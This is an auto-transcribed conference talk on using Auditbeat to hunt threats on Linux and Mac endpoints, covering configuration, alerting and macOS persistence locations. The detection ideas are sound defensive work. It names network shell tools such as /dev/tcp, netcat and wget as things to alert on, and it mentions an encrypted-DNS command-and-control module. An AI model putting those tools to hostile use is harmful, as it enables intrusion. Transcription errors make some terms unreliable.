Threat Hunting On Linux And Mac With Auditbeat System Module

all right good morning first talk of the day so you know hope everybody had a little bit of coffee at least so Who am I InfoSec guy been on the red team for a while now on a blue side for the last four years five years or so live in Frankfort as he said I'm a American expat my wife and kids they all have three passports apiece I have only one so but it lets me stay here so so this talk I'm going to talk to you a little bit about my experiences with Linux and Mac threat hunting I work inside of InfoSec and elastic I'm not on the sales team I'm on the InfoSec team

so my job is protecting the actual elastic networks and of course we do that using elastic tools so elastic as a company we're distributed worldwide 1,600 people most of the people work from home so that's a you know I sit at home working on my laptop all day long all of our developers work from home most of our salespeople you know travel they'll work from trains planes coffee shops wherever and it's my job to help protect that we don't have we only have two physical offices or two big physical offices endpoints or mostly mac sprinkling of Linux sprinkling of windows in there basically when a new hire starts elastic they say what do you want and person picks what they want so

we've got a lot of Macs sales team for some reason has a lot of Windows the and the developers have whatever they want which we've got you know all sorts of flavors of Linux out there our actual infrastructure all lives in the cloud so we've got infrastructure and all three major cloud providers so it's not just an AWS security shop we've got to deal with we've got GCP is your we've got IBM cloud stuff we've got $0.10 cloud so it's you know it's exciting sometimes and yes all of our build infrastructure is publicly facing we about once a week we get a bug bounty person trying to collect a reward for finding our Jenkins so yes we know it's out there all right

so what's this talk about we're going to talk about the problem that you know we're seeing an InfoSec you know kind of a solution that we've got from the endpoint gonna talk about the quick overview of audit beat and they do the new modules that are out and how we use them and then how you can use them for alerting incident response and then threat hunting on Macs and Linux and then automating a lot of this stuff all right problem for defenders it's good good for privacy not so good for a lot of the network defenders I'm sure a lot of people have felt this out there you know you're collecting you know Zeke data you're

collecting data at your network parameter level and just everything keeps getting encrypted you know now everybody you know I saw a bunch of Twitter Wars back and forth about the pros and cons of DNS over HTTPS at the browser level you know visibility is going down it's just a fact of life so you can either sit and moan about visibility going down you can try to break the encryption at your perimeter on all of your users and really mess with their privacy which also you know doesn't go over well with a lot of labor unions over here in Europe or you can try to work you know try to find a different solution so also the other

thing with the network logs if you're looking at 443 traffic okay you guys 443 connection to AWS there's no context there you know it came from a system but you don't have any context it happens millions of times a day you know so nobody's gonna actually fire an alert to that yeah this is just you know a little quick example the DNS over HTTPS this is a PowerShell thing I wrote back when I was doing Red Team type stuff that you can slap into PowerShell Empire and then all your DNS inside of your commanding control payload is encrypted you know while everybody's you know arguing over whether the browser should encrypt it the attackers are already

doing it yeah too many logs not enough money this is the other problem so if you you know networks getting faster 5g is coming out everybody's getting faster and faster Internet and of course your applications your computers are using this faster internet they're creating more event logs they're creating more traffic and so if you try to collect all that your prices just keep going up you know anybody who's you know tried to collect all this stuff and store it on AWS or stored in some sort of blogging server you know you start to see your monthly bill just keep going up every single month you know your it gets harder and harder to justify that so you

know I always try to look at okay for this for this data source you know how many detections per dollar am I gonna get how many you know how many times am I gonna find an attacker using this data set and how much is it gonna cost what's the trade-off because you know you everybody would love to collect everything but the the accounting people are not going to let you do that all right so the solution for now at least you know we'll see how this goes in the future endpoint visibility so a lot of people have been talking about this with sis Mon on Windows systems you can do audit beat as well and that's

what this talk is about on the Linux and the Mac systems so the key is to get the logs streaming almost in real time off of the endpoints and into a central central place that way you can you can do all the magic with it basically yeah and it gives you context so once again you know TCP 443 to a BWS on your firewall yeah I don't care I'm not gonna look into it calc running is route making a TCP 443 connection that's probably something you need to look into and without that endpoint data you're not going to have this context okay so here's the overview of audit beat that top line is directly copy/paste from the

website lightweight shipper it lightweight is an it doesn't use too much processing power that all depends on your configuration you can change your configuration and have it move we use 100% of one core I don't recommend that it contains three modules and inside the audit can be config the audit D the file integrity and then the system module which is the new one which I'm going to spend most the time talking about so the audit d module Linux only this is the one so the older versions of audit B this is the original way that we were monitoring Linux boxes it just uses the audit these subsist so if you're familiar with oddity you'll be familiar with this module so I got

the pros and cons there the pro uses the same configuration options as ah daddy if you've spent any amount of time messing with oddity you may consider that a con because it's not the most intuitive configuration options ah daddy lets you it if you just turn out a D on to log everything it will log every single sis call on the entire system as it happens that is extraordinarily noisy you do not want to do that on an enterprise like if you're you know if you've got a malware sandbox it's great you can see absolutely everything that malware does on the sales guy's computer you know you don't want to do that so you definitely have to tune your

configuration that's where the cons go a single if you turn everything on a single process start will have 8 to 15 events for every time any process runs the file integrity module this is a you know it's in the name it monitors the integrity of files and folders so it gets a you know works on Linux Mac and Windows monitors for changes to folders changes to attributes of files within a folders so if somebody goes and adds a sticky bit to a file in a folder you'll see that they go and modify Etsy hosts you'll see that you know really good for monitoring changes in activity and folders it also does a an initial scan

once you first load it and it gets the hash of all the files so if you you know you can turn that off from a collection point of view if that's going to be too noisy but if you can and if you can afford it it's great to collect because then you have an initial file hash of every file on all these critical folders inside your domain so the system module that's the the core thing I'm gonna be talking about here so release it oughta be six six that's you know just got updated in seven four and it's kind of like I like I always think of it as system on four for Linux and Mac system

on is the Windows version if you're not familiar with it that Microsoft made system on we made audit beat collects six different data sets not all of them are available on Mac because Apple likes to lock things down and not be friendly but it's better than nothing so oh yeah the the polling versus uh I think I get into that state versus event so when you're setting up your configuration file for system module there's there's a states vs. events the system module most of the modules work on a polling basis sue say every second show me all of the processes running on the box and will show me all the new processes that have started in the last second so that you

can imagine the disadvantage if a process starts and stops and between that second then you're not going to see it in your logs with Network events that's really bad but we just changed that in seven four so the state is you can say okay every 12 hours show me all of the installed applications all of the installed packages or every seven days you know it all depends on how much you want to collect so when you're configuring audit me pave close attention to the system the the polling versus the state and that's where I was saying you can you can tell it to consume a lot of your CPU usage like say you really want to see everything you

can tell your your process data set instead of pulling every second pull every tenth of a second and you'll start seeing your CPU usage on a course spiking up so these are the data sets the host data log in package process socket user and be going through those the host data set is available on all three Mac Linux and Windows collects the current state information about the host IP address makkad all the MAC addresses the IP address the uptime and so this is one of those ones that we like to collect every 12 hours or so because then you know you kind of get a snapshot of what's going on so then if there's any changes to it

you can say okay every 30 minutes show me if the IP address changed show me if the the host name has changed show me if the uptime has changed and so there's it'll say hey the Box rebooted sometime in the last 30 minutes the every host gets a unique host ID any logs so if as the hostname changes the the host ID stays the same so as you're building out your dashboards things like that the host ID is the one to pay attention to login data said this is a Linux only we don't have this on Mac or Windows successful failed logins reads you TMP so so nice thing with the all logged in users that'll show you

everybody you know you'll get you know spool you'll get Apache you it's not just like actual real human beings it's all of the users on the Linux system so you kind of get an idea so you can whitelist a lot of that stuff if you know that these guys are you know these system accounts are expected to be there oh yeah in it for remote IPS you get the like SSH logins you get the remote IP address and then the terminal type as well so like TTY one TTY 0 etc package data set Linux and Mac this isn't this isn't like all the applications installed on a system this just uses like DP you know dpk dpkg RPM or

homebrew so on a mac system you'll see all of the homebrew applications installed but you won't see the actual like you know applications from the App Store that have been installed I use file mod or file integrity for that because it just shows me all the folders in the applications directory it so you get a pretty good idea of what apps are installed on system yeah definitely do not set the polling on this too low cuz every single time it's trying to get all the installed packages it runs dpkg or brew and it says show me everything that's installed and then it compares it against the little local database sends you an alert with any of the new updates

so this yeah inventory management this is a great thing for inventory management we had you know every month you get a vulnerability alert comes out it's like all this you know this version of injects is you know as vulnerable so I just go into my dashboard and say okay show me everybody who's got that vert injects installed and show me all the versions and now I can say okay these three hosts need to go update their they need to run out get update process database or process data set this is the key one you use for the threat hunting Mac Linux and Windows get the process name the hash current directory a lot of the same stuff you'd

expect from sis Mon the parent information about who started the process every process gets a unique entity ID that's kind of like the process gooood and system on so then you can use that into the ID to track like you know track further execution if you see that process opening sockets things like that so you can have polling as well so you can say hey every every 30 minutes show me every single process running on this system once again I don't recommend that online especially online user workstations maybe if you've got some sensitive sensitive equipment out there maybe you want to run it on your webserver just to get an idea but you know otherwise if you pull once a second

it'll show you all the new stuff socket data set this is Linux only does not work on Mac monitors network traffic does what it says so one of the downsides if you use audit D you can monitor socket connection socket creations but with Auto D and Linux it only shows you one side of the connection so it'll say incoming connection from this IP address or outgoing connection you know with this source IP and it's you don't get that full connection information in a single event you have to you know you have to really work to get that all together and ah daddy so with the socket data set it gets you all that information and then

seven four would they you know we completely retooled it so now it uses K probes so you get there's no more polling so you get all the events and it shows all the flow information so you get packet bike pack account when that you know as soon as that that connection is over you get all that you know that all that data you'd come to expect from bro but you've got it on the host with all of the process information to enrich it so you know exactly who started it how many in packets they sent where they sent it etc user data set Linux only does what it says also shows when logon when passwords are

changed which is kind of nice to see okay how when was i if you once you've been collecting this data for a while you can say when is the last time this user change their password all right so now going to talk a bit about configuring the auto because you can't just take if you just take ought to be use the default configuration and deploy it to your entire domain you're gonna have a bad day you need to tune this everything so it gives you a mo file inside of this file you can configure exactly which modules are run exactly how often they pole you can whitelist you can drop events there's lots and lots of configuration like I I've

started into this for all the workstations and I thought I was doing pretty good and then our cloud guys showed me their config and I think it was a 500 lines long with all the white listing they do and exclusions and sis calls that they collect so you know there some people know it a little better than others see the config file controls everything about ought to eat basically so this is one of my favorite processors so you know don't collect something if you're not going to use it and we're doing this on all of our endpoints so we've got privacy concerns we got employees all around the world different concerns that you know so we

don't collect browser data so I say okay you know drop all 443 traffic from Chrome so you can do ORS and ands and you can have as many of those as you want so you know the or statement you usually just start out with one or statements a if it matches any of these drop it so if its existing process process error process stop anything that's a field and elastic you can just you know do that like process you know destination dot port 443 destination IP goes in pretty easily so you can just make a whole list of you know events that you want to filter and so what we try to do this about once a month where

we go in and look at the config and you say okay what what are unnecessary noise in my cluster right now you know I've got this one system creating this error log is you know sending me a hundred thousand events a day okay well let's you know let's push that so it doesn't show it to my cluster so then I stop getting billed for that and everybody's happy because now I don't have noise in my system I'm not paying for it at the cluster level it just gets dropped and the ORS in the ends you can nest those if you want you can have some pretty complex drop statements these are some metadata processors so the top one

that's so by default the process socket set won't include all of the parent process information it'll just have the parent process pid' so you can do this so now as every process comes in you get all of the process information as well as all of that processes parent information as well so you'll get the parent process you know current working directory the parent process command line etc so then in a single event you have a lot more context and in order to make your decisions the cloud metadata one so interesting note so when you turn on the cloud metadata it says okay I'm in the cloud but I have no idea which cloud I'm in so it will try to talk to

the that AWS service and get information about which cloud it's in so the one six nine or whatever that IP address on AWS so if you see your audit be making connections out to this don't worry that's actually okay but because it doesn't know which clouded in first it does a discovery so you know you may have oughta be deployed in AWS and you'll see it making DNS queries to assure to IBM to you know to all these different cloud services you know to $0.10 because that's a big cloud provider in the world then so that may freak out some people in the u.s. to say hey my systems are making DNS queries to $0.10 you know or vice versa so just one

of those things to consider I mean in the host metadata every city that can add a lot to your storage if you do that but it's really nice to have so then every single event has all of the host information as well so you get the host ID on every single event but that can make for some really nice dashboard so then you just pop in the host ID into your search bar and bam you've got every event for that host the queue this is something that I learned about and it is very important if you have a laptop so this is basically says okay store all the events in a nice little file when you're offline when you can't

talk to Internet as soon as you plug back in at boom sends all the events and you can control that buffer as to how many events it sends at once I put it 10 Meg's because you know that's in the grand scheme of things not to much if you have some users on some really bad network connections you they may complain about that things to consider so if you're deploying Auto beat out to a bunch of laptops anybody with root access can modify and you the config so do not put any sensitive information in there don't put a password to your elasticsearch cluster in there you know it I recommend and what we do is we ship it to log

stash so then yes you have to deploy you know the certificate so that it can talk to log stash and an attacker could get that and flood your log stash with bad events but they can't log into your cluster so it's you know definitely a trade-off there so all right gonna get into threat hunting alerting an incident response so I like to break down what I can do with this information into three different categories you know the COS host base events there's a lot you can do with them there's a lot of information there and sometimes it's it gets overwhelming is where you where to start so you can break it down and see if you have a large enough you know

InfoSec team you can break this down into multiple teams as well so that each person focuses on their own thing so real-time alerting I put that in quotes the you know because it's polling because boxes are offline and you're using you know Watchers it's not real time but it's close enough threat hunting's that definitely is the big category that I like to do and then the Incident Response in forensics timelines get into that a bit so alerting so Watchers in elastic you can use Watchers to basically run a query every X number of seconds minutes hours and then any any any results to that search query you can then do whatever you want with them

at that point so you can detect living off the land a be missed so let's say you do a search query to say hey every time this command is run that your antivirus doesn't care about at all but I care about because you know I want to see it because this in my network I know this is bad so I can make my custom antivirus signatures like this and get alerts with it so with Watchers so there's a ton of walter sigma rules out there i'm sure people in this room heard of sigma sock prime has a nice tool on coder i/o to take those convert them into watcher rules pretty quick and easy and then

from there you can you can have your your alerting is basically a web hook so we send ours to slack and hive an info second elastic you can do whatever you want with them we actually were discussing an Alexa skill that will you know play a sound every time and alert fires which my family would very quickly not like you know one person mentioned he'd like to think of alerts like the severity level of alerts as wine growl and bark you know and that was an Alexis skill we were discussing yeah would get turned off very quickly something consider when you're if you're doing this type of thing in jest time versus actual event time so when you write a

watcher you have to specify which you know what like okay look at everything that with a timestamp of the last 30 minutes and then you know show me if there's any new hits so which timestamp do you look at cuz a lot of events do you have the timestamp when they've been actually happened or when they event hit your cluster and so we we use when the event hit the cluster because let's say I take my laptop and I fly to California which 10 hour flight or something and I didn't pay for Wi-Fi so I'm offline while I'm on the flight I go fall asleep somebody uses the the evil charging cable attack or something

on a you know add some add some malware to my system I land in California finally gets my hotel a few hours later and then now I connected Internet if my watcher is only looking at events that actually happened in the last 30 minutes it'll miss that entire flight so you have to look at the when it actually hits your your class with the ingest time that little code there that's that's the one line it takes to your log stash config or your your ingest configure on elastic to add that so now you've got the actual time when the event happened versus the time when it hits your cluster a so incident response and forensics so if you have

all of the data all ready to go then why do you need to go pull a hard drive so you can make all these dashboards ahead of times I'm not gonna go in too deep on this I actually gave a talk on this with the Windows systems at b-sides Munich so that's the link at the bottom for that video that Cooper was nice enough to get video you can basically make the the dashboards and timeline so that when somebody has a question when you have an alert that fires and you're wondering this doesn't look right to you instead of going and you know getting physical access to a system to go investigate it you just go look at the dashboard and

you can usually answer your questions threat hunting so threat hunting based on the assumption you've been compromised do you assume compromise and you say the attackers are in a network and I haven't caught them now what psycho process it's just it never ends you're just constantly adapting and sometimes you do the same hunt you know multiple times a year because you know maybe the attackers came in during that time my recommendations keep each hunt narrowly focused as possible sometimes people say I'm gonna hunt for bad guys and that's okay you know hunt for bad guys doing one specific thing and then you know once you've determined whether they have or have not and that data in your logs or

not then you move on to the next one and you or you adapt and you say hey I wasn't able to complete this hunt because I don't have this data so what do I need to do in order to get this data into my cluster and into my hands so that I can do this investigation I'm the more data you have the better once again it's a balance because data costs money logging costs money so you got to balance that out with with all your needs there oh yeah on that last line if you had the more information you have in a single cluster or viewable by a single clock stir the the better it is if you have to

go to one place for your endpoint protection in one place for your network logs and another place for your proxy logs another place for your like AWS logins that it just you cannot get good visibility that way and everything takes longer all right so threatened threatened ting on Macs so this was kind of an experience for me because I've been a Windows person for the last five or six years my number one programming language before this was PowerShell so now I'm you know Mac forensics Mac investigation focused so Mac they lock down the systems which is good for security not so good for visibility you don't get socket you don't get login you don't get

user information we're working on that just bought in games so now they've got an agent for it so maybe that'll help us out a bit there's also relatively few write-ups about max about compromises about malware come you know there's objective-c that's like the one website I know of that has a pretty good collection of Mac based malware and attacks so then you can kind of go and say okay let me look at this attack and how would I detect that if you know let me look this next one how would I detect that if that if somebody came at us with this attack all right so the big thing that I've been looking for with the Mac

data so you don't have the socket information so it's kind of harder finding like the beaconing type stuff but you can find for a you can do a pretty good job of looking for persistence because Mac has it's only got a few places for persistence and a fairly well-documented so you can watch for changes to those so then you know the big thing is the launch agents the launch Damons some of them run as root some of run as users every time you not install a new app like if it starts when you boot up it installed a launch agent or a launch daemon you install it most of the time I've got alerts for all of

these when something new gets stalled and most of the time it's key base getting installed or slack getting installed or something like that but that's fine I'm ok with that because I can I can sift through those and then or I can just drop those specific processes in my config and then I see everything else so yeah I monitor them with the file integrity monitoring as well as watch for any processes where those folders are in the arguments this is just a quick config Oh know if you can read that so you can see like the launch control load that's that's the command that you run to to actually load a process so that it gets loaded every

time on start or you can just use VI to edit the the plist file and the next time it boots up it'll get started on its own so that's why you want to monitor for both this was just you know quick snapshot of like this is like the last seven days so we've got 1500 systems and this is over the last seven days so you can see it's not too noisy as far as alerts go once you tune out like the actual write noise in and I think I'll probably add the key base upload you know key base updater to my whitelist so I don't see that again kernel extensions so texts so this got

changed in Catalina so if you've updated the Catalina then this doesn't quite apply but they didn't Mack didn't you know communicate that well with a lot of the developers so they think they still support it but they're saying on the next version they're gonna cut it off completely but a kernel extension so like the kernel extension I see most often is Google Drive so people install Google Drive so that when you open up finder you can actually see your Google Drive folders in within finder that's a an extension of the actual kernel of the operating system you know so these as you can imagine these you know could probably be done as a rootkit type thing

it it changes how a lot of the functionality of the actual computer works you say you watch that system library extensions folder you can do text yeah so kext load is the process that will actually load it you can do text load list if you want to see all the processes or all the kernel extensions currently loaded on your box this there's a command you can run on the terminal if your root it'll show you all the kernel extensions so it's a big one that you want to watch for and also be prepared to white light the white list noise you know certain environments like Google Drive okay everybody's got that in minot environment let me get rid

of that so Tron it you know who Mack under the hood is a Linux system it has cron installed the only application I've seen using cron on our network is coop control so our kubernetes developers they're constantly setting off everybody else I I don't see any cron execution on these are the other 1,600 so Mac system so it's it's there it works it will start things that boot up but it's not used that often anymore definitely wants one of those things to keep an eye on defaults it sets the defaults took me it is a bit of confusion when we started a conversation on this you know I want to look at the defaults okay well what do

you mean the actual command is called defaults and it changes the defaults so if you do defaults read it's a huge law it'll spit out a big JSON with all the defaults on your Mac and you can write it's a just a plist file you know you can take a pee list write it to that and now your defaults on your Mac have changed and this can be used to say okay every time the you know every time you start up run this command one of those things to keep an eye out on private at sea it's kind of like the Etsy folder on Linux but Mac they had to be different they put it under private Etsy so

definitely there's a lot of stuff in there that can be used to boot up or to cause execution on startup so you're like bash RC system-wide bash RC file so every time somebody starts up a terminal this gets run you know man kampf you know you got users that are developers you had you modify this every time somebody runs a man command to look up some documentation they execute malware a lot of interesting ways you can do this so watch for changes in there it shouldn't be changing a lot so just keep an eye on that malware execution so we watch for sudou at any time sudo gets run on a box because we're you know all of our engineers are

out there and a lot of them have Mac's we see this a lot and we've done a lot of white listing on this but if you've got you know let's say all of your marketing team has max you shouldn't see sudu being run on the Marketing System boxes that often so it this is one of those things that you just you've got a monitor this comes into the threat hunting like you don't want to like have an alert waking you up or barking at your Alexa on this one but it's one of those things that you review once a week Python if you look at you know you look at Objective C you look at a lot of the Mac Mac malware it

uses Python for for execution if you look at PowerShell empire they've got a Python version that works on Macs for command and control you know if you want to do some red teaming pen testing on Macs so keep an eye out on Python once again and network full of developers that gets tricky so it's just kind of machine learning can help with that where if you're looking for strange execution of Python like you see the same thing getting executed over and over again and now here you'll sudden you see this system that's never run Python or this Python command has never been run in your domain that can really help with a lot of that stuff and then

the big ones parent to child process relationships if you see microsoft word spawning a terminal and then suddenly you know in a chain of events leading to it modifying etsy hosts and yeah just that's you know that that lineage is about that's one of the key indicators for compromised malicious apps this is one of the challenging one if you look at most of the Mac exploits and vulnerabilities you know they're compromises it's somebody installed an app that they shouldn't install and Mac does a fairly good job of locking it down and they've they've even made it harder now with Catalina to install third-party apps which I heard like even OpenOffice now is not installing or not

working right on the newest version of Mac because of this so is what it is but from a security point of view that's better because it makes it harder for our users to install a malicious app so but the big thing to look for is look for rare apps installed on your fleet and then when you see an app do some research we have people all around the world we have employees in China you know Australia everywhere and so I definitely see some local apps that you know like hey oh you know this one's common in Korea I've never seen it anywhere else so you you know worldwide type organization you start to learn all these local apps that

everybody likes all right threat hunting on Linux this yeah this is my life on the Linux systems so get familiar with all the Linux admin cues we the first place I go when I see a Linux alert as to our Linux admins github because we put in like issues every time they're doing maintenance or changing things or changing configurations and I just do a search for that system that fired the event because 99% of time it's in there if not I look at the user name or who's logged into that system and I slack message them because if you you know if you set off all the alarms hey I've been infected there's an apt every time you

see something crazy on Linux you're gonna you know very quickly be the boy who cried wolf and nobody's going to talk to you so threat hunting on Linux exploit detection so there's this a lot of this is straight out of Sigma rules so dev TCP look for you know web shells things like that so for most of the Linux systems I monitor are part of our develop it infrastructure in the cloud and not so much on the workstations so you don't see net cat running that off and on those systems you don't see W get unless some command or script is running it and any whitelist that look for strange things it's that this is really

is the key to the Linux box the Linux threat hunting the machine learning that's one of the things I wanted to talk about with it's really good and invites a you've got environment with lots and lots of containers and you're constantly you stand up a new container it does stuff and then it tears down and it's this ephemeral type action you see the same commands being run over and over and over again so the machine learning is pretty good at saying hey this just gets to be part of the normal baseline and human activity stands out like a sore thumb so your machine learning says hey somebody was logged into this box at this time and then

that's where I go over the Linux admin queue who say ok what were they doing ok yep somebody was actually logged into the system focused alerting definitely so that link there that's a Sigma rule that Linux suspicious commands it's like 20 different commands that are all suspicious and that's great and I you know I used that but I really recommend breaking it up into individual rules because if if that comes off as one alerts like hey a suspicious command was run on a Linux box that's okay thanks you can break your alerts up so your Watchers show you exactly what the rule was and it's my personal preference it's better to have 20 rules as opposed to

one alright just an example of stuff I see in our network you know okay yeah that looks bad you know that specific command that installs missed so yeah okay cool you know this is this is the life of flood threat honey on Linux you see some crazy things and then you just gotta verify his admins will a lot of times the admins and the attackers are doing the exact same type of commands and yes context is key so look at the process look at the surrounding events if you can see an admin logged in and they updated docker they updated a bunch of things like that and then they ran the suspicious command usually the

attackers don't log in and update your docker images and update other things before running they're suspicious command alright so conclusion endpoint visibility that's from a from an info sector out hunting point of view I I started out doing the network visibility stuff and I was very quickly frustrated with how much I didn't know and now with the endpoint visibility it's it's very quick and easy to answer your questions to get that context so that every time you see something weird you're not you know setting everybody you know get waking everybody up for false alarms but the NetFlow all that stuff if you can have all that stuff in the same location then now you've got all the context you

can say okay this network connection seen here you know was this process and that was bad now you know quickly expand out say show me all of the other systems and processes in my entire domain that made that connection and yeah the obligatory we are hiring just like everybody else like I said elastic we don't care where you live so you can you know sit in your house and work for us so down to the question section do we have any questions the audience nope yes hello thank you for your talk for the host ID which is persistent even if you change your host name does it work over he installs Oh what is it actually based on

which animated host ID it's it's generated when the audit beat is installed I can't there's some algorithm for generating the ID I can't remember exactly what it was but so yes if you if you uninstall audit beat and then reinstall auto beat I believe it gets it I'm not a hundred percent on that but I'm pretty sure it gets a new host ID so in cluster type you know in a container type environment if you just have your your container script install out a beat as the container is built each container gets its new even if it's even though it's a copy of the same exact image with all the exact same hardware settings and

everything it every time it gets a new host ID hi you mentioned cloud discovery inaudible is not owned by default or you didn't do you need to enable it I can't remember if that was in the default config or not that it's the cloud metadata functionality I believe that's on by default so yeah I can't remember that I'd been looking at my config so long I it's been a while since I've actually looked at the default config but it's a quick one-line thing to turn on and off and the data in there is pretty nice because it shows you which you know which clustered in which what the cloud account so you know we have a lot of accounts so we have

customers that use our cloud infrastructure so when I see an alert I've got that and say oh this is the exact the the Google GCP account for that alert and so then I surpassed that over to our cloud security team and they know exactly you know okay that was this customer that was this image within their cloud that was this is the cluster that they were in or the damage so all that information really helps in a cloud environment okay thank you very much I think in giving me without boat and